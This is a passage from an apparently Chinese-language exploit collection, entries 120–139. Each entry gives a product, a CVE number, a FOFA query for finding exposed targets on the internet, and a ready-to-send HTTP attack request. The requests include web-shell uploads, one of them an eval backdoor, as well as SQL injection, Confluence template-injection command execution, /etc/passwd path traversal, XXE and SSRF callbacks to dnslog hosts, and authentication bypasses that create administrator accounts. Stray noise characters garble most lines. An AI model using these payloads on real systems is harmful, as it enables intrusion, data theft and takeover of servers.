& n9 x4 w- b+ tTe: trailers
3 R3 z" E9 o/ g5 M7 HConnection: close3 y, s! q) H5 G. C9 L4 A
D7 |* R; ?. Isrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456! Y0 m9 E* r" [( A
. B) E d' W8 K# k6 g' _9 s! Z
+ b" t2 M) ?7 a y0 a' s1 d3 ^- C
120. 北京百绰智能S40管理平台导入web.php任意文件上传
, @( `: O+ D/ T \: lCVE-2024-1253
- A$ g( g/ b, K, [: wFOFA:title="Smart管理平台"
8 E7 e# p6 m2 s9 X& D% c4 TPOST /useratte/web.php? HTTP/1.1, v* C9 }. v) B
Host: ip:port* W& ]* j' [% ^* g% j% N! b$ |$ F: [
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
( z) t1 Z. |9 G4 }: e: u+ S7 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko+ f j$ a! l, V* v2 H! [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 ^7 A) S; w. O; Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( X1 s+ a% Y! G0 R4 D
Accept-Encoding: gzip, deflate8 \ }1 j c/ I- {
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
: N* _( H; O1 z4 DContent-Length: 597
8 w/ y$ P- ~3 \- |0 JOrigin: https://ip:port D& T% D8 ?7 m7 Y$ u- f o
Referer: https://ip:port/sysmanage/licence.php( R0 F% }( C' x S+ A) T6 |( G
Upgrade-Insecure-Requests: 1
; n" G. f" c/ f% x, I+ C5 GSec-Fetch-Dest: document7 H4 D/ q" y5 Z; y: H t2 o6 M) F
Sec-Fetch-Mode: navigate
' l4 A$ V- N( d* P8 FSec-Fetch-Site: same-origin
0 ]7 K6 Z7 v- N7 S& vSec-Fetch-User: ?1
( ]1 l) _& w nTe: trailers I0 z5 H' o: r" L
Connection: close
. Y+ l) `: {# Y) ^! Y. {3 f
2 _3 J( u' J7 x2 r- a" s6 {: R2 {; X-----------------------------42328904123665875270630079328" [: `5 \1 g2 T. O* J$ c3 p
Content-Disposition: form-data; name="file_upload"; filename="2.php"8 A) s$ Q' E- Q( X/ ^
Content-Type: application/octet-stream
$ e9 g- ^. a% w+ i. C
" v* a# s1 v7 ~<?php phpinfo()?>- r- }7 h1 ~4 X z3 r$ {" B
-----------------------------42328904123665875270630079328
& q8 j3 Q2 F9 r+ r4 C- \- }Content-Disposition: form-data; name="id_type"6 W$ h: g* R8 f
* H7 `& k5 J% v8 ^1
) q! w' [( G: T! }! z-----------------------------42328904123665875270630079328
+ k" g* I* j8 xContent-Disposition: form-data; name="1_ck"
3 T' s0 q9 K. |- A$ ~: z0 S' R0 @
# w- j6 S6 ~, g% [6 [0 |1_radhttp% _+ v/ b! i: U# h. Q
-----------------------------42328904123665875270630079328
5 `/ L& z% c. I& G$ v! YContent-Disposition: form-data; name="mode". g3 O+ w$ X9 K9 M: _, ]
4 d5 ~% q3 P" H3 r1 d" g$ m
import: Z) O2 I1 l& d. [# R
-----------------------------42328904123665875270630079328
9 G" P8 D d; A% d' w* Z" f2 ^( e6 e( N% E/ O& y% Y& X2 j
6 c: b2 f2 J8 c9 B: b$ I! ?文件路径/upload/2.php
1 |" v5 k3 u2 F3 t( b- M Z9 _ C: g1 c% n3 ]# H% ~
121. 北京百绰智能S42管理平台userattestation.php任意文件上传! ^. l8 L8 @8 I& a4 O
CVE-2024-19186 B9 U' p- q( `# o! X% x$ ^
FOFA:title="Smart管理平台"
1 w" Y8 ]% J5 _$ s1 Y" ]; K$ zPOST /useratte/userattestation.php HTTP/1.10 r" L9 ?/ `( ]2 S" \
Host: 192.168.40.130:8443
# K; Y4 i3 E; Z8 TCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50 l+ C% h9 i, m. N+ c1 H
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" j! I# [1 }3 u) q# J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 r, d) y+ |6 Y- i5 Z9 M9 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ?$ k% \! Q- a6 rAccept-Encoding: gzip, deflate
D7 U$ q% t4 z. MContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328+ o3 K. n" X t: s0 X8 Y/ h
Content-Length: 5923 R- j8 J m8 P/ L% _
Origin: https://192.168.40.130:8443
% B$ W2 N9 e+ a. p) k5 j1 T! e* S0 [' aUpgrade-Insecure-Requests: 12 |- _' Z) \) J/ R" b9 R. ]3 }
Sec-Fetch-Dest: document
- H7 h7 v$ g: D8 J9 S4 ]Sec-Fetch-Mode: navigate
/ S! k7 E; F! a8 r# g* ]1 RSec-Fetch-Site: same-origin
! f. b' a Q' aSec-Fetch-User: ?1
0 ^0 r' ]7 }" l% V3 M7 K3 @9 HTe: trailers" |7 F N" D& R
Connection: close
6 U( ]6 o3 @ X. \0 i* v9 b
; D5 K. R c/ I( x. W L% g-----------------------------423289041236658752706300793281 |) ?: k% {2 Z& H7 L8 b; B
Content-Disposition: form-data; name="web_img"; filename="1.php"' ~3 n5 |0 L2 C5 O- S* O8 G2 c
Content-Type: application/octet-stream
' E* _$ J* w. Q2 q. t1 P
( |; b$ D/ ^1 x! _) d: m<?php phpinfo();?># X' f- C0 |* D$ s% C. S
-----------------------------42328904123665875270630079328+ C* N9 q. t/ |+ g" b
Content-Disposition: form-data; name="id_type"
- F, G9 I# z1 B
9 y' t- X/ B1 K' D7 x! @; ~1
4 {8 p0 f3 f6 { e' ^-----------------------------42328904123665875270630079328
2 S+ a! R1 z& C+ w' }Content-Disposition: form-data; name="1_ck"8 N% J/ B% P* O1 T
3 r" X; K4 V" F$ X* w* a+ t4 w' k3 N1_radhttp+ z" u5 v. Y; X4 f
-----------------------------42328904123665875270630079328# k0 D4 E- O; O S
Content-Disposition: form-data; name="hidwel"
: ^6 C! ]1 ?; A N: i+ n: j9 a3 R7 M, j
set) \+ T1 d/ f0 |/ _$ R4 P) X
-----------------------------42328904123665875270630079328
* E+ h8 h4 D, D- T% T: ^. c$ c3 Q' A5 _! c4 Z+ ^1 H+ }, l
7 _- ^5 U) Z$ S+ N8 O$ p+ s
boot/web/upload/weblogo/1.php
1 w# V7 O' r5 u0 _* [ d4 H- R/ {9 K7 q& O/ Z- h" l) x. y& X4 a
122. 北京百绰智能s200管理平台/importexport.php sql注入5 v7 j9 ~4 Y2 i, T3 t5 n
CVE-2024-27718FOFA:title="Smart管理平台"
* `( z+ p; N& o. z" x# }其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
) c N' l* b( }6 {4 ~& NGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.12 o) U. h* u7 k7 t( _; R
Host: x.x.x.x! u0 H$ B" |9 H4 _/ {! R8 ? \
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc07 R6 {, C8 z; {/ u0 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 L& I: ^0 W! {5 \* sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. N3 B+ X# {. H7 Q: M3 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) X0 b, ?" P0 P% vAccept-Encoding: gzip, deflate, br
, j( n! {0 x u* {* `: w5 T. LUpgrade-Insecure-Requests: 1
7 g7 o2 e8 o- g7 sSec-Fetch-Dest: document
! O7 z! G" h+ i- j7 a6 {Sec-Fetch-Mode: navigate3 t2 c0 t( N/ f6 \' d- d) W2 B
Sec-Fetch-Site: none
2 A7 k" q% m- P6 R1 ~Sec-Fetch-User: ?1
8 V5 g7 p D4 X5 JTe: trailers
0 v2 D) [, n& tConnection: close
3 D/ B/ @2 d: j6 n8 M
+ o+ f. a3 I' T: z9 \' b# T) @$ x" ]1 \" [! d; w8 B. F! |5 D+ S
123. Atlassian Confluence 模板注入代码执行( d. X( g0 P- b( O; X' f }
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
' | \. J3 N* Z- a$ U& t; U; ~4 BPOST /template/aui/text-inline.vm HTTP/1.16 B+ a" E- R6 Z( m- |* h
Host: localhost:8090
3 O6 u6 o% C& S# W0 Q& FAccept-Encoding: gzip, deflate, br" O" U3 ?& e, W& h4 O3 }7 H! F
Accept: */*
% F4 m3 u7 Q- T8 y6 X3 B$ vAccept-Language: en-US;q=0.9,en;q=0.84 y! a: H7 A. ?, l+ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
: V/ e) K$ @! {Connection: close
+ E6 ^! o: M m2 C# |9 U$ nContent-Type: application/x-www-form-urlencoded
- e4 i/ a0 b( a- a0 \3 h3 k" _ ^; v1 F5 i4 w0 u# }$ U
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))8 M1 \: ?' h( f; j$ t) F* C' r( K
0 J" Z4 H- o5 I) ~9 M# g# B0 f# n+ v5 V2 B+ v# _/ Q
124. 湖南建研工程质量检测系统任意文件上传
: j: F& }3 H, {5 E/ BFOFA:body="/Content/Theme/Standard/webSite/login.css"! s/ }1 M" q( d! p" Z9 W
POST /Scripts/admintool?type=updatefile HTTP/1.1 x8 p) B5 Q y
Host: 192.168.40.130:8282
' F$ k, Y3 H2 a8 v% j$ c% T' aUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* B4 M: i8 k R) V8 _4 _: jContent-Length: 720 o$ ~$ {' D' f! L$ U* h) g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' x- k& j( s4 u L4 w% `/ p
Accept-Encoding: gzip, deflate, br, Q5 m8 o' q! ^$ v, h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: R! L! U& ]7 f# |
Connection: close
. v' W! O3 h3 w1 K2 [2 Y: DContent-Type: application/x-www-form-urlencoded
/ F% e. g1 k; u$ R+ U" }) D3 ], y4 f5 ^
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>5 r1 F% Q# m2 x; k) d4 h7 e
- Q. b; D8 _# |5 m% [5 G9 |0 A+ y& h% y+ A& @6 \. G
http://192.168.40.130:8282/Scripts/abcgcg.aspx
3 f5 D2 y& ~6 r& b: B3 m
- f0 J8 A+ T" |125. ConnectWise ScreenConnect身份验证绕过
/ c( O2 I9 m! d. Z+ kCVE-2024-1709
$ z' R/ r5 x( P8 ~; G, yFOFA:icon_hash="-82958153"
# @* C# X2 z0 {, ~5 z. k$ j3 C: K! fhttps://github.com/watchtowrlabs ... bypass-add-user-poc( ?( g& n0 L; j6 R' g4 p
; O4 F' N' L: O4 d" `% O1 m" X# q4 i1 y) g$ p0 C3 P
使用方法
/ `$ X4 R4 I3 Kpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
% x4 a3 G0 |8 S1 s. p4 h4 c8 q7 d) v% G6 n( x- O& [
% C0 d9 T9 x. o' r0 W- @' }% O创建好用户后直接登录后台,可以执行系统命令。, n* t, A1 N' d8 d. T) t0 `/ ]
" Y7 @5 r5 D6 Z4 U
126. Aiohttp 路径遍历0 W& x5 [# I! C$ x- r* t3 q
FOFA:title=="ComfyUI"2 D5 z7 G7 ]! {2 R
GET /static/../../../../../etc/passwd HTTP/1.1
4 O+ i2 P" r+ }& b' j% }Host: x.x.x.x
/ ]0 A* E+ V) w( {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 M4 s* M, p+ A- ?" m; ]3 r
Connection: close- p U6 i+ t% e' O5 C( z) O- @6 h
Accept: */*
/ R9 f8 q: }# |. b* T& r7 [Accept-Language: en( `/ ~8 m; G4 N1 G: ~) z
Accept-Encoding: gzip
# D; G3 E3 i- _1 P5 ^: P6 M6 t+ r9 @0 l, k L* ?0 b
+ W1 L% z( A3 i8 A2 `5 a1 g127. 广联达Linkworks DataExchange.ashx XXE
u# i& h+ T" V4 j; y5 R/ T0 F, zFOFA:body="Services/Identification/login.ashx"
; f; u" o0 X; [- zPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
, K! O) S v% p3 U' V& cHost: 192.168.40.130:8888
+ n e- s" |5 m2 i+ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36, u# a9 j% P: }- ~" Y
Content-Length: 415, u a( @/ O" _( x& Z6 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) @) C, v- w/ ^' f% w3 J
Accept-Encoding: gzip, deflate
5 ^0 G' w; j7 |3 p# m, n) ]Accept-Language: zh-CN,zh;q=0.9
; f1 ~( _; @" m+ S+ m- ~9 a& G0 YConnection: close1 _) A" Y) @; p/ i
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe01 r. V3 _+ {! [
Purpose: prefetch* s- ]' O% y% V6 b/ i
Sec-Purpose: prefetch;prerender
& b+ ^/ g7 Q3 ]. K. U
! I# b v' K; ]6 z7 H------WebKitFormBoundaryJGgV5l5ta05yAIe0
" ?# Q. I; \, H! DContent-Disposition: form-data;name="SystemName"
3 l% ]5 x4 c/ w- {: M$ e3 _: a$ f8 V* O7 w" w$ k' `7 C' w2 @ L8 A
BIM
# d7 v* P& _+ u: w2 C------WebKitFormBoundaryJGgV5l5ta05yAIe0! N( p' G* h. F4 y; M; J; h
Content-Disposition: form-data;name="Params"
- j9 u2 g/ r% D) T7 u) {/ r2 ]Content-Type: text/plain
. {2 u/ ~9 {7 ]0 @: `/ f- O
3 k6 I) n% L n8 b* N<?xml version="1.0" encoding="UTF-8"?>
; z1 O. o! D! F/ J. C0 |<!DOCTYPE test [8 N" {- l1 c/ I1 s: P
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
! z9 E' B) ?1 _% F# g' W3 _]5 [2 o) C4 W# Y. L! i- ?% u
>
8 q0 G) C9 Q$ [; O# P( V* O<test>&t;</test>
. y" k, a- c0 a y2 [------WebKitFormBoundaryJGgV5l5ta05yAIe0--! }/ ~, B7 Q9 m% ~
: [( Y9 K, P$ w; F% y8 O0 P4 T( W: O( d
% q& T: [8 e; d/ H% V4 { r, x128. Adobe ColdFusion 反序列化
4 I4 L$ ?' f2 U2 ]! {, I; ]CVE-2023-382031 ?4 f5 r3 x' F/ @( b7 T& X; [: I
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)+ y, M% _! O% h+ J( K
FOFA:app="Adobe-ColdFusion"
% `: a0 r% I: OPAYLOAD
. K/ Q, j! o2 v6 X: J2 d e0 K! R$ V% a
129. Adobe ColdFusion 任意文件读取
- w5 \' G3 n; n- K! {CVE-2024-20767/ ~7 r' k- @& z' F# _4 h; T6 d& m1 i
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
; x- u( C- z: R3 p+ n# c第一步,获取uuid
3 ?/ ] m# Z9 E% l4 \GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 C- M- x4 W; ]3 O
Host: x.x.x.x
& E% ]. J8 o5 ^! z7 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& r1 U# Q" t- b. `' e: z9 U
Accept: */*. f- n: w5 W) C! d# ~$ i- Z
Accept-Encoding: gzip, deflate
" y. P! M0 ?0 G1 RConnection: close, _! g+ V" z! y4 B2 O
4 l! A% v3 x! F) ?9 t6 g9 m
( R. n9 o* X1 S- V+ N2 i/ h第二步,读取/etc/passwd文件4 r. }. J# T9 l) `
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.14 Y) S, l5 X: \! s1 o" O
Host: x.x.x.x/ _5 L4 E2 o& Q9 x( G# d- l l5 w. f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 R8 ?6 o( ]" d7 t; Y7 {0 b" g
Accept: */*
* F+ \' s l' S! q& jAccept-Encoding: gzip, deflate
) R* o; @' I2 A$ [1 j8 o2 YConnection: close3 Y. f& ]. O; l1 }
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
4 D) ~6 e6 t6 ]8 u! i$ j1 s4 `( d% p7 Q% k* f
2 O; e, g# _# [ `, z- i4 _130. Laykefu客服系统任意文件上传8 s( i/ B( e J: x2 S' m H
FOFA:icon_hash="-334624619"
2 z# x# b' s. J% C: ]8 APOST /admin/users/upavatar.html HTTP/1.1; c3 P& k' O* P; Z6 g
Host: 127.0.0.1! ?2 u0 D7 M& ~1 d p. F
Accept: application/json, text/javascript, */*; q=0.01
2 T, b$ a+ S) nX-Requested-With: XMLHttpRequest
( T0 d6 @7 l: w0 k! K' |User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" s1 u6 M/ M" \0 d$ V" {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
: _9 X# A5 e% W# w+ VAccept-Encoding: gzip, deflate# b% n% L" T; @. u' b2 n
Accept-Language: zh-CN,zh;q=0.9
: j5 T9 j! K/ Q6 f- v z/ H% _& V9 _Cookie: user_name=1; user_id=3/ U' `: V* Q' I* @ M& O, U: M* t
Connection: close: {' A7 x) [" q* I6 X4 m& P5 ^
8 @, V! ]2 W# e5 Q2 H$ W* c------WebKitFormBoundary3OCVBiwBVsNuB2kR# X# r. D7 G( `* N& u9 w
Content-Disposition: form-data; name="file"; filename="1.php"
9 E8 O* `3 r' f) W+ _Content-Type: image/png
8 l- g F5 E. I) H6 Y$ J
/ P4 t h9 v* ]5 Z<?php phpinfo();@eval($_POST['sec']);?>/ Q' {6 |& m) S: R
------WebKitFormBoundary3OCVBiwBVsNuB2kR--( w- k" E- B( T7 A
+ p* S, |- N( r8 c. [/ F/ y0 l0 S) H( ?0 \
131. Mini-Tmall <=20231017 SQL注入& m! H9 L: ?* {
FOFA:icon_hash="-2087517259"! [' t( [2 r" |* A
后台地址:http://localhost:8080/tmall/admin
}, D( M6 A8 K; ihttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
( g/ o8 c! L: m! `, G% H/ e, U; K" j8 d; _) b
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' h( u, R, P+ O5 O+ O2 A
CVE-2024-271984 c5 {+ ^+ ? [$ ^
FOFA:body="Log in to TeamCity"
/ W. s$ N5 X5 y) _; K) d8 b- ^POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.10 S( }0 \3 N& s3 C4 M' G" H
Host: 192.168.40.130:8111
. h5 w6 z7 B& n! q0 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ p) u3 V. ?( `$ N7 G$ g& z$ wAccept: */*- c+ Y' a7 I. R2 p, g# S1 P$ Z& D
Content-Type: application/json3 C( `# k& ^4 A7 c! P& o9 c. P* `
Accept-Encoding: gzip, deflate
" W: ~; `) p4 V' K8 n' Z; u G
+ c6 [- B) |1 u- D/ f{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
) v5 w! A+ P- _
$ |5 J) G$ O7 F* }5 _4 D9 ?& {: ^6 A1 n, ]/ p5 e
CVE-2024-27199
1 M, m9 _0 F d. U# ~4 I# D/res/../admin/diagnostic.jsp
& f7 |7 y# B1 K& G/.well-known/acme-challenge/../../admin/diagnostic.jsp
8 u, M; m" B! i/ n X/ r, I3 X) ]/update/../admin/diagnostic.jsp# [5 C+ x% z5 k
% H6 e8 o1 s6 R6 {+ h8 B
' a2 q/ n5 Z+ a" A+ @CVE-2024-27198-RCE.py
6 `, _% G3 V) T" C+ J* Z! [' S5 E! Y
133. H5 云商城 file.php 文件上传
3 g; G) K/ K: H( `) PFOFA:body="/public/qbsp.php"
# i$ _: w' Q8 q$ d8 K+ A& c [& pPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
w( h1 t1 H! |' p! Y: A( sHost: your-ip
; J/ X8 k% y; F! i: n' ?2 o* ]5 ]) NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ U& _$ b, B2 D9 C `# U- o, X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
/ J$ L' |' u9 y6 w y/ s' W+ ?5 O
) r0 p4 \" Y3 N3 M! Y0 e& V3 M------WebKitFormBoundaryFQqYtrIWb8iBxUCx
5 f- U- }* B I/ D# l+ B( nContent-Disposition: form-data; name="file"; filename="rce.php"4 J$ t; k4 R8 q0 w o6 _5 T
Content-Type: application/octet-stream4 Y2 A$ d( \7 d! ?1 d
* P: e! H, s/ }& C, m. I5 @- B
<?php system("cat /etc/passwd");unlink(__FILE__);?>; z0 V' `/ O4 M$ [! R
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--4 k6 l M! M/ e2 h
/ g2 {$ |! w) ?2 Z' h
+ H- q0 D, g. P
/ T2 v" v5 H2 @+ @+ {% k* I134. 网康NS-ASG应用安全网关index.php sql注入3 ?( ^9 c$ C* o$ K5 R2 J
CVE-2024-2330
" b7 z+ W o1 a1 wNetentsec NS-ASG Application Security Gateway 6.3版本! S( _* l2 t- ^1 U% V& s
FOFA:app="网康科技-NS-ASG安全网关"
9 ?* d# |: J8 f8 @8 d aPOST /protocol/index.php HTTP/1.1
5 g' X% Z f* o' w+ O- jHost: x.x.x.x
! g" X& d) K# g0 N( eCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
( m/ b( J Z ~/ n9 V; E vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.02 g' F/ ?$ i3 T& a
Accept: */*" ^4 |) z6 Q$ o9 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 s# _ O! r4 E0 E- J' H
Accept-Encoding: gzip, deflate" M9 x; j4 i; s+ W
Sec-Fetch-Dest: empty/ H) ]. y0 A; ?0 d
Sec-Fetch-Mode: cors+ o; f. c2 Y& G# N) H
Sec-Fetch-Site: same-origin( w# I$ q: i( `" M- d; \5 ^
Te: trailers
" J; a+ s& c) Z; j. m `7 R- KConnection: close& m6 A/ \5 \4 ?6 o H
Content-Type: application/x-www-form-urlencoded- F, r0 P: U4 x1 l
Content-Length: 263
5 t( ?$ T8 ~8 s' \3 H: S& R4 ~6 ~" N# H+ `5 C
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}. @- f3 g7 a; ?7 _ H4 w& G
2 t p" y3 L( f4 G6 p' s) W# B. H n* C3 W. F( ?
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入9 Z8 J7 @9 ~0 A' R( r4 i4 I8 Z
CVE-2024-2022
* F" r) J/ V7 C) W4 E3 d: lNetentsec NS-ASG Application Security Gateway 6.3版本
% Y& `+ K( C& F5 `) n! U; h* S: r6 a2 zFOFA:app="网康科技-NS-ASG安全网关"
* }' J+ @5 @. X. V! N2 G3 k) TGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1 o Q' i4 L& V! `' e
Host: x.x.x.x0 G1 C* D( @1 e, p1 F c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 z" N; J. [5 a. U( c2 \# _8 l7 q9 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 l& @$ G' M0 Z# Z4 `2 j% u8 U
Accept-Encoding: gzip, deflate
# L& }: p6 d3 e( WAccept-Language: zh-CN,zh;q=0.9
8 i6 W4 x k& T$ w! G/ |8 K2 QConnection: close! J+ P( F: H9 q* M% D9 S6 R
2 W* F) O& e5 @1 O3 g
2 }0 V* N/ v' o. O# I136. NextChat cors SSRF
}; Z& ~! s% u/ jCVE-2023-49785& u) [' V# ~, V& W) u9 s9 N) z
FOFA:title="NextChat"( J9 m' o& F4 {1 Z4 L: [7 \' q
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
* i/ T( h: K( F gHost: x.x.x.x:10000
8 ]. C2 e9 C# n& U% L, QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; |$ k+ d+ X( `
Connection: close
' {9 O* n9 \6 A4 R4 y9 WAccept: */*. \: v* ?5 k/ z6 C0 D
Accept-Language: en
$ Z5 c7 x% M9 F1 JAccept-Encoding: gzip
/ m( K3 n- A9 |$ H4 m$ N( V) j' O% Q3 \
& {1 T3 u0 _# m6 S1 b( G6 F6 g
137. 福建科立迅通信指挥调度平台down_file.php sql注入
( q' w' ?$ q1 {/ e q% tCVE-2024-2620! Y* \* t1 C) Q5 Y4 i! F: j0 f& I/ \
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; ]/ [$ b n- h9 j( [* a9 U* MGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
1 v b2 i' n$ B z. nHost: x.x.x.x; c( R/ o7 [) R6 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; n& Q) {6 j4 X! z3 y4 T% P" e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: J/ U! m D2 m' i0 A+ hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: R+ c6 ^; H. M5 x- WAccept-Encoding: gzip, deflate, br' i# R: Z/ I7 s
Connection: close
4 Q% O' J4 `) y3 UCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
. Z" U8 r) t8 v, u$ yUpgrade-Insecure-Requests: 1; U( m1 ?9 v/ A' d& t
i4 {# x( F, }. H3 o6 ]" l" b3 g
( o6 i6 Q, [6 Q& E
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
6 t4 x' | d q# iCVE-2024-26213 m2 h. N& c4 _& S; d: F0 S- a
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( h, R9 N. U* T) ^* R9 Q4 Y1 {GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1) q: f$ r _7 k$ o; t4 x' u0 O6 w
Host: x.x.x.x/ b* L4 h. G! x/ ^. n# R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; \* [" m$ F2 f8 k+ z1 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 ?# @9 G) R* [( B1 [4 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ D3 I( ]; U/ x4 V
Accept-Encoding: gzip, deflate, br
* A8 n* a/ J& n' CConnection: close
& `- s$ |% v5 Y; g% S) b: tUpgrade-Insecure-Requests: 1! r* W8 s) n0 S4 I
6 K3 G' ]1 M( f8 u' [8 D) w2 D t) C' g4 k2 [8 U; ^3 \
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
y! N4 B9 b) cCVE-2024-2622
